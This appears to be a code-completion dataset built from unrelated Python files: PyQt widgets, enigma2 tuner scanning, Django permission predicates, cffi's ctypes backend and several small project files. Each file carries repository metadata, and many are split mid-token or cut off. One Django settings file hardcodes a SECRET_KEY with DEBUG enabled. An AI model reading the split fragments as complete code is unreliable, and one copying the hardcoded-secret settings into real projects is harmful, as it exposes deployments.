offset = dropRow - top
# print 'offset is %d'%offset
for i, row in enumerate(selRows):
r = row + offset
if r > self.rowCount() or r < 0:
r = 0
for j in range(self.columnCount()):
# print 'source is (%d, %d)'%(row, j)
# print 'item text: %s'%self.item(row,j).text()
source = QTableWidgetItem(self.item(row, j))
# print 'dest is (%d, %d)'%(r,j)
self.setItem(r, j, source)
# Why does this NOT need to be here?
# for row in reversed(selRows):
# self.removeRow(row)
event.accept()
else:
QTableView.dropEvent(event)
def getSelectedRowsFast(self):
selRows = []
for item in self.selectedItems():
if item.row() not in selRows:
selRows.append(item.row())
return selRows
def droppingOnItself(self, event, index):
dropAction = event.dropAction()
if self.dragDropMode() == QAbstractItemView.InternalMove:
dropAction = Qt.MoveAction
if event.source() == self and \
event.possibleActions() & Qt.MoveAction and \
dropAction == Qt.MoveAction:
selectedIndexes = self.selectedIndexes()
child = index
while child.isValid() and child != self.rootIndex():
if child in selectedIndexes:
return True
child = child.parent()
return False
def dropOn(self, event):
if event.isAccepted():
return False, None, None, None
index = QModelIndex()
row = -1
col = -1
if self.viewport().rect().contains(event.pos()):
index = self.indexAt(event.pos())
if not index.isValid() or \
not self.visualRect(index).contains(event.pos()):
index = self.rootIndex()
if self.model().supportedDropActions() & event.dropAction():
if index != self.rootIndex():
dropIndicatorPosition = self.position(
event.pos(), self.visualRect(index), index)
if dropIndicatorPosition == QAbstractItemView.AboveItem:
row = index.row()
col = index.column()
# index = index.parent()
elif dropIndicatorPosition == QAbstractItemView.BelowItem:
row = index.row() + 1
col = index.column()
# index = index.parent()
else:
row = index.row()
col = index.column()
if not self.droppingOnItself(event, index):
# print 'row is %d'%row
# print 'col is %d'%col
return True, row, col, index
return False, None, None, None
def position(self, pos, rect, index):
r = QAbstractItemView.OnViewport
margin = 2
if pos.y() - rect.top() < margin:
r = QAbstractItemView.AboveItem
elif rect.bottom() - pos.y() < margin:
r = QAbstractItemView.BelowItem
elif rect.contains(pos, True):
r = QAbstractItemView.OnItem
if r == QAbstractItemView.OnItem and \
not (self.model().flags(index) & Qt.ItemIsDropEnabled):
r = QAbstractItemView.AboveItem if pos.y() < rect.center(
).y() else QAbstractItemView.BelowItem
return r
class FDetailShow(QTextEdit):
def __init__(self, jsondata, parent=None):
super(FDetailShow, self).__init__(parent)
self.parent = parent
self.setText(jsondata)
self.setReadOnly(True)
self.installEventFilter(self)
self.setFocus()
def mousePressEvent(self, event):
if event.button() == Qt.RightButton:
pass
else:
super(FDetailShow, self).mousePressEvent(event)
class FTableItemDetailWidget(QFrame):
def __init__(self, jsondata, row, column, parent=None):
super(FTableItemDetailWidget, self).__init__(parent)
self.parent = parent
self.startX = 0
self.row = row
for i in range(column):
self.startX += self.parent.columnWidth(i)
self.setWindowFlags(Qt.Popup)
self.setFixedSize(self.parent.columnWidth(3), 220)
detailShow = FDetailShow(jsondata, self)
detailShow.setFixedSize(self.width(), 200)
self.titleLabel = QLabel("Data", self)
self.titleLabel.setAlignment(Qt.AlignCenter)
self.titleLabel.setObjectName("FTableItemDetailWidgetTitlebar")
self.titleLabel.setFixedSize(self.parent.columnWidth(3), 20)
mainlayout = QVBoxLayout()
mainlayout.addWidget(self.titleLabel)
mainlayout.addWidget(detailShow)
mainlayout.setSpacing(0)
mainlayout.setContentsMargins(0, 0, 0, 0)
self.setLayout(mainlayout)
self.installEventFilter(self)
self.show()
def eventFilter(self, obj, event):
if event.type() == QEvent.MouseButtonPress:
self.close()
return True
else:
return super(FTableItemDetailWidget, self).eventFilter(obj, event)
def showDetail(self):
self.jsonshowPosX = self.parent.mapToGlobal(QPoint(self.startX, 0)).x()
self.jsonshowPosY = self.parent.mapToGlobal(QPoint(self.startX, self.parent.rowViewportPosition(self.row))).y()\
- self.height() + self.parent.horizontalHeader().height()
self.move(self.jsonshowPosX, self.jsonshowPosY)
self.show()
def resizeEvent(self, event):
self.titleLabel.setFixedWidth(self.width())
|
OpenLD/enigma2-wetek
|
lib/python/Screens/ScanSetup.py
|
Python
|
gpl-2.0
| 68,521
| 0.030093
|
from Screen import Screen
from ServiceScan import ServiceScan
from Components.config import config, ConfigSubsection, ConfigSelection, ConfigYesNo, ConfigInteger, getConfigListEntry, ConfigSlider, ConfigEnableDisable
from Components.ActionMap import NumberActionMap, ActionMap
from Components.ConfigList import ConfigListScreen
from Components.NimManager import nimmanager, getConfigSatlist
from Components.Label import Label
from Components.Sources.StaticText import StaticText
from Tools.HardwareInfo import HardwareInfo
from Screens.InfoBar import InfoBar
from Screens.MessageBox import MessageBox
from enigma import eTimer, eDVBFrontendParametersSatellite, eComponentScan, eDVBFrontendParametersTerrestrial, eDVBFrontendParametersCable, eConsoleAppContainer, eDVBResourceManager
from Components.Converter.ChannelNumbers import channelnumbers
from boxbranding import getMachineBrand
def buildTerTransponder(frequency,
inversion=2, bandwidth = 7000000, fechigh = 6, feclow = 6,
modulation = 2, transmission = 2, guard = 4,
hierarchy = 4, system = 0, plpid = 0):
# print "freq", frequency, "inv", inversion, "bw", bandwidth, "fech", fechigh, "fecl", feclow, "mod", modulation, "tm", transmission, "guard", guard, "hierarchy", hierarchy
parm = eDVBFrontendParametersTerrestrial()
parm.frequency = frequency
parm.inversion = inversion
parm.bandwidth = bandwidth
parm.code_rate_HP = fechigh
parm.code_rate_LP = feclow
parm.modulation = modulation
parm.transmission_mode = transmission
parm.guard_interval = guard
parm.hierarchy = hierarchy
parm.system = system
parm.plpid = plpid
return parm
def getInitialTransponderList(tlist, pos):
list = nimmanager.getTransponders(pos)
for x in list:
if x[0] == 0: #SAT
parm = eDVBFrontendParametersSatellite()
parm.frequency = x[1]
parm.symbol_rate = x[2]
parm.polarisation = x[3]
parm.fec = x[4]
parm.inversion = x[7]
parm.orbital_position = pos
parm.system = x[5]
parm.modulation = x[6]
parm.rolloff = x[8]
parm.pilot = x[9]
tlist.append(parm)
def getInitialCableTransponderList(tlist, nim):
list = nimmanager.getTranspondersCable(nim)
for x in list:
if x[0] == 1: #CABLE
parm = eDVBFrontendParametersCable()
parm.frequency = x[1]
parm.symbol_rate = x[2]
parm.modulation = x[3]
parm.fec_inner = x[4]
parm.inversion = x[5]
parm.system = x[6]
tlist.append(parm)
def getInitialTerrestrialTransponderList(tlist, region, skip_t2 = False):
list = nimmanager.getTranspondersTerrestrial(region)
#self.transponders[self.parsedTer].append((2,freq,bw,const,crh,crl,guard,transm,hierarchy,inv))
#def buildTerTransponder(frequency, inversion = 2, bandwidth = 3, fechigh = 6, feclow = 6,
#modulation = 2, transmission = 2, guard = 4, hierarchy = 4):
for x in list:
if x[0] == 2: #TERRESTRIAL
if skip_t2 and x[10] == eDVBFrontendParametersTerrestrial.System_DVB_T2:
# Should be searching on TerrestrialTransponderSearchSupport.
continue
parm = buildTerTransponder(x[1], x[9], x[2], x[4], x[5], x[3], x[7], x[6], x[8], x[10], x[11])
tlist.append(parm)
cable_bands = {
"DVBC_BAND_EU_VHF_I" : 1 << 0,
"DVBC_BAND_EU_MID" : 1 << 1,
"DVBC_BAND_EU_VHF_III" : 1 << 2,
"DVBC_BAND_EU_SUPER" : 1 << 3,
"DVBC_BAND_EU_HYPER" : 1 << 4,
"DVBC_BAND_EU_UHF_IV" : 1 << 5,
"DVBC_BAND_EU_UHF_V" : 1 << 6,
"DVBC_BAND_US_LO" : 1 << 7,
"DVBC_BAND_US_MID" : 1 << 8,
"DVBC_BAND_US_HI" : 1 << 9,
"DVBC_BAND_US_SUPER" : 1 << 10,
"DVBC_BAND_US_HYPER" : 1 << 11,
}
cable_autoscan_nimtype = {
'SSH108' : 'ssh108',
'TT3L10' : 'tt3l10',
'TURBO' : 'vuplus_turbo_c'
}
terrestrial_autoscan_nimtype = {
'SSH108' : 'ssh108_t2_scan',
'TT3L10' : 'tt3l10_t2_scan',
'TURBO' : 'vuplus_turbo_t'
}
def GetDeviceId(filter, nim_idx):
tuners={}
device_id = 0
socket_id = 0
for nim in nimmanager.nim_slots:
name_token = nim.description.split(' ')
name = name_token[-1][4:-1]
if name == filter:
if socket_id == nim_idx:
break
if device_id: device_id = 0
else: device_id = 1
socket_id += 1
return device_id
class CableTransponderSearchSupport:
# def setCableTransponderSearchResult(self, tlist):
# pass
# def cableTransponderSearchFinished(self):
# pass
def __init__(self):
pass
def tryGetRawFrontend(self, feid):
res_mgr = eDVBResourceManager.getInstance()
if res_mgr:
raw_channel = res_mgr.allocateRawChannel(self.feid)
if raw_channel:
frontend = raw_channel.getFrontend()
if frontend:
frontend.closeFrontend() # immediate close...
del frontend
del raw_channel
return True
return False
def cableTransponderSearchSessionClosed(self, *val):
print "cableTransponderSearchSessionClosed, val", val
self.cable_search_container.appClosed.remove(self.cableTransponderSearchClosed)
self.cable_search_container.dataAvail.remove(self.getCableTransponderData)
if val and len(val):
if val[0]:
self.setCableTransponderSearchResult(self.__tlist)
else:
self.cable_search_container.sendCtrlC()
self.setCableTransponderSearchResult(None)
self.cable_search_container = None
self.cable_search_session = None
self.__tlist = None
self.cableTransponderSearchFinished()
def cableTransponderSearchClosed(self, retval):
print "cableTransponderSearch finished", retval
self.cable_search_session.close(True)
def getCableTransponderData(self, str):
#prepend any remaining data from the previous call
str = self.remainingdata + str
#split in lines
lines = str.split('\n')
#'str' should end with '\n', so when splitting, the last line should be empty. If this is not the case, we received an incomplete line
if len(lines[-1]):
#remember this data for next time
self.remainingdata = lines[-1]
lines = lines[0:-1]
else:
self.remainingdata = ""
for line in lines:
data = line.split()
if len(data):
if data[0] == 'OK':
print str
parm = eDVBFrontendParametersCable()
qam = { "QAM16" : parm.Modulation_QAM16,
"QAM32" : parm.Modulation_QAM32,
"QAM64" : parm.Modulation_QAM64,
"QAM128" : parm.Modulation_QAM128,
"QAM256" : parm.Modulation_QAM256 }
inv = { "INVERSION_OFF" : parm.Inversion_Off,
"INVERSION_ON" : parm.Inversion_On,
"INVERSION_AUTO" : parm.Inversion_Unknown }
fec = { "FEC_AUTO" : parm.FEC_Auto,
"FEC_1_2" : parm.FEC_1_2,
"FEC_2_3" : parm.FEC_2_3,
"FEC_3_4" : parm.FEC_3_4,
"FEC_5_6" : parm.FEC_5_6,
"FEC_7_8" : parm.FEC_7_8,
"FEC_8_9" : parm.FEC_8_9,
"FEC_3_5" : parm.FEC_3_5,
"FEC_4_5" : parm.FEC_4_5,
"FEC_9_10" : parm.FEC_9_10,
"FEC_NONE" : parm.FEC_None }
parm.frequency = int(data[1])
parm.symbol_rate = int(data[2])
parm.fec_inner = fec[data[3]]
parm.modulation = qam[data[4]]
parm.inversion = inv[data[5]]
self.__tlist.append(parm)
tmpstr = _("Try to find used transponders in cable network.. please wait...")
tmpstr += "\n\n"
tmpstr += data[1].isdigit() and "%s MHz " % (int(data[1]) / 1000.) or data[1]
tmpstr += data[0]
self.cable_search_session["text"].setText(tmpstr)
def startCableTransponderSearch(self, nim_idx):
def GetCommand(nim_idx):
global cable_autoscan_nimtype
try:
nim_name = nimmanager.getNimName(nim_idx)
if nim_name is not None and nim_name != "":
device_id = ""
nim_name = nim_name.split(' ')[-1][4:-1]
if nim_name == 'TT3L10':
|
try:
device_id = GetDeviceId('TT3L10', nim_idx)
device_id = "--device=%s" % (device_id)
|
except Exception, err:
print "GetCommand ->", err
device_id = "--device=0"
# print nim_idx, nim_name, cable_autoscan_nimtype[nim_name], device_id
command = "%s %s" % (cable_autoscan_nimtype[nim_name], device_id)
return command
except Exception, err:
print "GetCommand ->", err
return "tda1002x"
if not self.tryGetRawFrontend(nim_idx):
self.session.nav.stopService()
if not self.tryGetRawFrontend(nim_idx):
if self.session.pipshown:
self.session.infobar.showPiP()
if not self.tryGetRawFrontend(nim_idx):
self.cableTransponderSearchFinished()
return
self.__tlist = [ ]
self.remainin
|
Kimi-Arthur/Pimix
|
deploy.py
|
Python
|
mit
| 805
| 0
|
import os
import re
import shutil
destination = 'C:/Software/Pimix/'
apps = [
'fileutil',
'jobutil'
]
include_patterns = [
r'\.exe',
|
r'\.exe\.config',
r'\.dll',
r'\.pdb'
]
exclude_patterns = [
'FSharp',
'vshost'
]
os.makedirs(destination, exist_ok=T
|
rue)
for app in apps:
for entry in os.scandir('src/{}/bin/Release/'.format(app)):
to_copy = False
for p in include_patterns:
if re.search(p, entry.path):
to_copy = True
break
if not to_copy:
continue
for p in exclude_patterns:
if re.search(p, entry.path):
to_copy = False
break
if to_copy:
shutil.copyfile(entry.path, '{}{}'.format(destination, entry.name))
|
uclouvain/osis
|
education_group/auth/predicates.py
|
Python
|
agpl-3.0
| 12,243
| 0.003921
|
from typing import Union
from django.conf import settings
from django.contrib.auth.models import User
from django.utils.translation import gettext_lazy as _, pgettext
from rules import predicate
from base.models.academic_year import current_academic_year
from base.models.education_group_year import EducationGroupYear
from base.models.enums.education_group_categories import Categories
from base.models.enums.education_group_types import TrainingType
from education_group.auth.scope import Scope
from education_group.calendar.education_group_extended_daily_management import \
EducationGroupExtendedDailyManagementCalendar
from education_group.calendar.education_group_limited_daily_management import \
EducationGroupLimitedDailyManagementCalendar
from education_group.calendar.education_group_preparation_calendar import EducationGroupPreparationCalendar
from education_group.models.group_year import GroupYear
from osis_common.ddd import interface
from osis_role.cache import predicate_cache
from osis_role.errors import predicate_failed_msg, set_permission_error, get_permission_error
from program_management.ddd.domain import exception
from program_management.models.element import Element
@predicate(bind=True)
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def are_all_training_versions_removable(self, user, group_year):
groups = group_year.group.groupyear_set.all().select_related(
'education_group_type', 'management_entity', 'academic_year'
)
return _are_all_removable(self, user, groups, 'program_management.delete_training_version')
@predicate(bind=True)
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def are_all_mini_training_versions_removable(self, user, group_year):
groups = group_year.group.groupyear_set.all().select_related(
'education_group_type', 'management_entity', 'academic_year'
)
return _are_all_removable(self, user, groups, 'program_management.delete_minitraining_version')
@predicate(bind=True)
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def are_all_trainings_removable(self, user, training_root):
training_roots = training_root.group.groupyear_set.all().select_related(
'education_group_type', 'management_entity', 'academic_year'
)
return _are_all_removable(self, user, training_roots, 'base.delete_training')
@predicate(bind=True)
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def are_all_minitrainings_removable(self, user, minitraining_root):
minitraining_roots = minitraining_root.group.groupyear_set.all().select_related(
'education_group_type',
'management_entity',
'academic_year'
)
return _are_all_removable(self, user, minitraining_roots, 'base.delete_minitraining')
@predicate(bind=True)
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def are_all_groups_removable(self, user, group_year):
groups = group_year.group.groupyear_set.all().select_related(
'education_group_type', 'management_entity', 'academic_year'
)
return _are_all_removable(self, user, groups, 'base.delete_group')
def _are_all_removable(self, user, objects, perm):
# use shortcut break : at least one should not have perm to trigger error
result = all(
user.has_perm(perm, object)
for object in objects.order_by('academic_year__year')
)
# transfers last perm error message
message = get_permission_error(user, perm)
set_permission_error(user, self.context['perm_name'], message)
return result
@predicate(bind=True)
@predicate_failed_msg(
message=pgettext("male", "The user does not have permission to create a %(category)s.") %
{"category": Categories.GROUP.value}
)
def is_not_orphan_group(self, user, education_group_year=None):
return education_group_year is not None
# FIXME: Move to business logic because it's not a predicate (found in MinimumEditableYearValidator)
@predicate(bind=True)
@predicate_failed_msg(
message=_("You cannot change/delete a education group existing before %(limit_year)s") %
{"limit_year": settings.YEAR_LIMIT_EDG_MODIFICATION}
)
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def is_education_group_year_older_or_equals_than_limit_settings_year(
self,
user: User,
obj: Union[EducationGroupYear, GroupYear] = None
):
if obj:
return obj.academic_year.year >= settings.YEAR_LIMIT_EDG_MODIFICATION
return None
@predicate(bind=True)
@predicate_failed_msg(message=_("The user is not allowed to create/modify this type of education group"))
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def is_user_attached_to_all_scopes(self, user: User, obj: GroupYear = None):
return any(Scope.ALL.name in role.scopes for role in self.context['role_qs'] if hasattr(role, 'scopes'))
@predicate(bind=True)
@predicate_failed_msg(message=_("The user is not allowed to create/modify this type of education group"))
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def is_education_group_type_authorized_according_to_user_scope(
self,
user: User,
obj: Union[EducationGroupYear, GroupYear] = None
):
if obj:
return any(
obj.education_group_type.name in role.get_allowed_education_group_types()
for role in self.context['role_qs']
if obj.management_entity_id in self.context['role_qs'].filter(pk=role.pk).get_entities_ids()
)
return None
@predicate(bind=True)
@predicate_failed_msg(message=_("The user is not attached to the management entity"))
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def is_user_attached_to_management_entity(
self,
user: User,
obj: Union[E
|
ducationGroupYear, GroupYear] = None
):
if obj:
user_entity_ids = self.context['role_qs'].get_entities_ids()
return obj.management_entity_id in user_entity_ids
return obj
# FIXME: Move to business logic because it's not a predicate
@predicate(bind=True)
@predicate_failed_msg(message=_("You must create the version of the concerned training and then attach that version"
" inside this version"))
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, '
|
pk', None))
def is_element_only_inside_standard_program(
self,
user: User,
education_group_year: Union[EducationGroupYear, GroupYear] = None
):
from program_management.ddd.repositories import program_tree_version
if isinstance(education_group_year, GroupYear):
element_id = Element.objects.get(group_year=education_group_year).id
try:
from program_management.ddd.domain.service import identity_search
node_identity = identity_search.NodeIdentitySearch.get_from_element_id(element_id)
tree_version_identity = identity_search.ProgramTreeVersionIdentitySearch(
).get_from_node_identity(
node_identity
)
tree_version = tree_version_identity and program_tree_version.ProgramTreeVersionRepository(
).get(tree_version_identity)
if tree_version and not tree_version.is_official_standard:
return False
except (interface.BusinessException, exception.ProgramTreeVersionNotFoundException):
pass
from program_management.ddd.repositories import load_tree_version
tree_versions = load_tree_version.load_tree_versions_from_children([element_id])
return all((version.is_official_standard for version in tree_versions))
return education_group_year
@predicate(bind=True)
@predicate_failed_msg(message=_("This education group is not editable during this period."))
@predicate_cache(cache_key_fn=lambda obj: getattr(obj, 'pk', None))
def is_program_edition_period_open(self, user, group_year: 'GroupYear' = None):
calendar = EducationGroupPreparationCalendar()
if group_year:
return calendar.is_target_year_authorized(target_year=group_year.academic_year.year)
return bool(calendar.get_target_years_opened(
|
Widiot/simpleblog
|
venv/lib/python3.5/site-packages/cffi/backend_ctypes.py
|
Python
|
mit
| 42,086
| 0.001022
|
import ctypes, ctypes.util, operator, sys
from . import model
if sys.version_info < (3,):
bytechr = chr
else:
unicode = str
long = int
xrange = range
bytechr = lambda num: bytes([num])
class CTypesType(type):
pass
class CTypesData(object):
__metaclass__ = CTypesType
__slots__ = ['__weakref__']
__na
|
me__ = '<cdata>'
def __init__(self, *args):
raise TypeError("cannot instantiate %r" % (self.__class__,))
@classmethod
def _newp(cls, init):
raise TypeError("expected a pointer or array ctype, got '
|
%s'"
% (cls._get_c_name(),))
@staticmethod
def _to_ctypes(value):
raise TypeError
@classmethod
def _arg_to_ctypes(cls, *value):
try:
ctype = cls._ctype
except AttributeError:
raise TypeError("cannot create an instance of %r" % (cls,))
if value:
res = cls._to_ctypes(*value)
if not isinstance(res, ctype):
res = cls._ctype(res)
else:
res = cls._ctype()
return res
@classmethod
def _create_ctype_obj(cls, init):
if init is None:
return cls._arg_to_ctypes()
else:
return cls._arg_to_ctypes(init)
@staticmethod
def _from_ctypes(ctypes_value):
raise TypeError
@classmethod
def _get_c_name(cls, replace_with=''):
return cls._reftypename.replace(' &', replace_with)
@classmethod
def _fix_class(cls):
cls.__name__ = 'CData<%s>' % (cls._get_c_name(),)
cls.__qualname__ = 'CData<%s>' % (cls._get_c_name(),)
cls.__module__ = 'ffi'
def _get_own_repr(self):
raise NotImplementedError
def _addr_repr(self, address):
if address == 0:
return 'NULL'
else:
if address < 0:
address += 1 << (8*ctypes.sizeof(ctypes.c_void_p))
return '0x%x' % address
def __repr__(self, c_name=None):
own = self._get_own_repr()
return '<cdata %r %s>' % (c_name or self._get_c_name(), own)
def _convert_to_address(self, BClass):
if BClass is None:
raise TypeError("cannot convert %r to an address" % (
self._get_c_name(),))
else:
raise TypeError("cannot convert %r to %r" % (
self._get_c_name(), BClass._get_c_name()))
@classmethod
def _get_size(cls):
return ctypes.sizeof(cls._ctype)
def _get_size_of_instance(self):
return ctypes.sizeof(self._ctype)
@classmethod
def _cast_from(cls, source):
raise TypeError("cannot cast to %r" % (cls._get_c_name(),))
def _cast_to_integer(self):
return self._convert_to_address(None)
@classmethod
def _alignment(cls):
return ctypes.alignment(cls._ctype)
def __iter__(self):
raise TypeError("cdata %r does not support iteration" % (
self._get_c_name()),)
def _make_cmp(name):
cmpfunc = getattr(operator, name)
def cmp(self, other):
v_is_ptr = not isinstance(self, CTypesGenericPrimitive)
w_is_ptr = (isinstance(other, CTypesData) and
not isinstance(other, CTypesGenericPrimitive))
if v_is_ptr and w_is_ptr:
return cmpfunc(self._convert_to_address(None),
other._convert_to_address(None))
elif v_is_ptr or w_is_ptr:
return NotImplemented
else:
if isinstance(self, CTypesGenericPrimitive):
self = self._value
if isinstance(other, CTypesGenericPrimitive):
other = other._value
return cmpfunc(self, other)
cmp.func_name = name
return cmp
__eq__ = _make_cmp('__eq__')
__ne__ = _make_cmp('__ne__')
__lt__ = _make_cmp('__lt__')
__le__ = _make_cmp('__le__')
__gt__ = _make_cmp('__gt__')
__ge__ = _make_cmp('__ge__')
def __hash__(self):
return hash(self._convert_to_address(None))
def _to_string(self, maxlen):
raise TypeError("string(): %r" % (self,))
class CTypesGenericPrimitive(CTypesData):
__slots__ = []
def __hash__(self):
return hash(self._value)
def _get_own_repr(self):
return repr(self._from_ctypes(self._value))
class CTypesGenericArray(CTypesData):
__slots__ = []
@classmethod
def _newp(cls, init):
return cls(init)
def __iter__(self):
for i in xrange(len(self)):
yield self[i]
def _get_own_repr(self):
return self._addr_repr(ctypes.addressof(self._blob))
class CTypesGenericPtr(CTypesData):
__slots__ = ['_address', '_as_ctype_ptr']
_automatic_casts = False
kind = "pointer"
@classmethod
def _newp(cls, init):
return cls(init)
@classmethod
def _cast_from(cls, source):
if source is None:
address = 0
elif isinstance(source, CTypesData):
address = source._cast_to_integer()
elif isinstance(source, (int, long)):
address = source
else:
raise TypeError("bad type for cast to %r: %r" %
(cls, type(source).__name__))
return cls._new_pointer_at(address)
@classmethod
def _new_pointer_at(cls, address):
self = cls.__new__(cls)
self._address = address
self._as_ctype_ptr = ctypes.cast(address, cls._ctype)
return self
def _get_own_repr(self):
try:
return self._addr_repr(self._address)
except AttributeError:
return '???'
def _cast_to_integer(self):
return self._address
def __nonzero__(self):
return bool(self._address)
__bool__ = __nonzero__
@classmethod
def _to_ctypes(cls, value):
if not isinstance(value, CTypesData):
raise TypeError("unexpected %s object" % type(value).__name__)
address = value._convert_to_address(cls)
return ctypes.cast(address, cls._ctype)
@classmethod
def _from_ctypes(cls, ctypes_ptr):
address = ctypes.cast(ctypes_ptr, ctypes.c_void_p).value or 0
return cls._new_pointer_at(address)
@classmethod
def _initialize(cls, ctypes_ptr, value):
if value:
ctypes_ptr.contents = cls._to_ctypes(value).contents
def _convert_to_address(self, BClass):
if (BClass in (self.__class__, None) or BClass._automatic_casts
or self._automatic_casts):
return self._address
else:
return CTypesData._convert_to_address(self, BClass)
class CTypesBaseStructOrUnion(CTypesData):
__slots__ = ['_blob']
@classmethod
def _create_ctype_obj(cls, init):
# may be overridden
raise TypeError("cannot instantiate opaque type %s" % (cls,))
def _get_own_repr(self):
return self._addr_repr(ctypes.addressof(self._blob))
@classmethod
def _offsetof(cls, fieldname):
return getattr(cls._ctype, fieldname).offset
def _convert_to_address(self, BClass):
if getattr(BClass, '_BItem', None) is self.__class__:
return ctypes.addressof(self._blob)
else:
return CTypesData._convert_to_address(self, BClass)
@classmethod
def _from_ctypes(cls, ctypes_struct_or_union):
self = cls.__new__(cls)
self._blob = ctypes_struct_or_union
return self
@classmethod
def _to_ctypes(cls, value):
return value._blob
def __repr__(self, c_name=None):
return CTypesData.__repr__(self, c_name or self._get_c_name(' &'))
class CTypesBackend(object):
PRIMITIVE_TYPES = {
'char': ctypes.c_char,
'short': ctypes.c_short,
'int': ctypes.c_int,
'long': ctypes.c_long,
'long long': ctypes.c_longlong,
'signed char': ctypes.c_byte,
'unsigned char': ctypes.c_ubyte,
'unsigned short': ctypes.c_ushort,
'unsigned int': ctypes.c_uint,
'unsigned long': ctypes.c_ulong,
'unsigned long long': ctypes.c
|
restless/mezzanine-slider-revolution
|
slider_revolution/admin.py
|
Python
|
mit
| 1,323
| 0.002268
|
from __future__ import unicode_literals
from django.contrib import admin
from django.core import urlresolvers
from mezzanine.core.admin import TabularDynamicInlineAdmin, StackedDynamicInlineAdmin
from .models import Slider, SlideCaption, Slide
class SlideI
|
nline(TabularDynamicInlineAdmin):
template = "slider_revolution/admin/slide_dynamic_inline_tabular.htm
|
l"
model = Slide
extra = 1
def changeform_link(self, instance):
if instance.id:
changeform_url = urlresolvers.reverse('admin:slider_revolution_slide_change', args=(instance.id,))
return '<a href="{}">Details</a>'.format(changeform_url)
else:
addform_url = urlresolvers.reverse('admin:slider_revolution_slide_add')
return '<a href="{}">Add</a>'.format(addform_url)
return u''
changeform_link.allow_tags = True
changeform_link.short_description = 'Slide'
fields = ("image_thumb", "changeform_link")
readonly_fields = ("image_thumb", "changeform_link",)
class SliderAdmin(admin.ModelAdmin):
inlines = (SlideInline,)
class SlideCaptionInline(StackedDynamicInlineAdmin):
model = SlideCaption
class SlideAdmin(admin.ModelAdmin):
inlines = (SlideCaptionInline,)
admin.site.register(Slider, SliderAdmin)
admin.site.register(Slide, SlideAdmin)
|
yiplee/ltc-huobi
|
ltc_huobi/settings.py
|
Python
|
mit
| 3,262
| 0.001226
|
"""
Django settings for ltc_huobi project.
Generated by 'django-admin startproject' using Django 1.11.2.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
import ltc
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: k
|
eep the secret key used in production secret!
SECRET_KEY = '6t$e^bg18g6u)((0gvfb(dnfh5y&=0_lz&5*-6hrs=mc&u1j#t'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['localhost']
# Application definition
INSTALLED_APPS = [
'ltc.apps.LtcConfig',
'django.co
|
ntrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'ltc_huobi.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'ltc_huobi.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
PROJECT_ROOT = os.path.normpath(os.path.dirname(__file__))
STATIC_ROOT = os.path.join(PROJECT_ROOT, 'static')
STATIC_URL = '/static/'
|
Urumasi/Flask-Bones
|
app/tasks.py
|
Python
|
mit
| 874
| 0
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from flask import render_template
from app.extensions import celery, mail
from app.data import db
from celery.signals import task_postrun
from flask_mail imp
|
ort Message
@celery.task
def send_registration_email(user, token):
msg = Message(
'User Registration',
sender='admin@flask-bones.com',
recipients=[user.email]
)
msg.body = render_template(
'mail/registration.mail',
user=user,
token=token
)
mail.send(msg)
@task_postrun.connect
def close_session(*args, **kwargs):
# Flask
|
SQLAlchemy will automatically create new sessions for you from
# a scoped session factory, given that we are maintaining the same app
# context, this ensures tasks have a fresh session (e.g. session errors
# won't propagate across tasks)
db.session.remove()
|
drvinceknight/sklDj
|
sklDj/implementations/__init__.py
|
Python
|
mit
| 59
| 0
|
from implementation import *
from implement
|
ations i
|
mport *
|
curiburn/pso2_grind_optimizer
|
py/main.py
|
Python
|
gpl-3.0
| 2,887
| 0.011304
|
import sys
import argparse
import time
sys.path.append('./bin/moabc')
import optimizer
#引数の処理
#parserの初期化
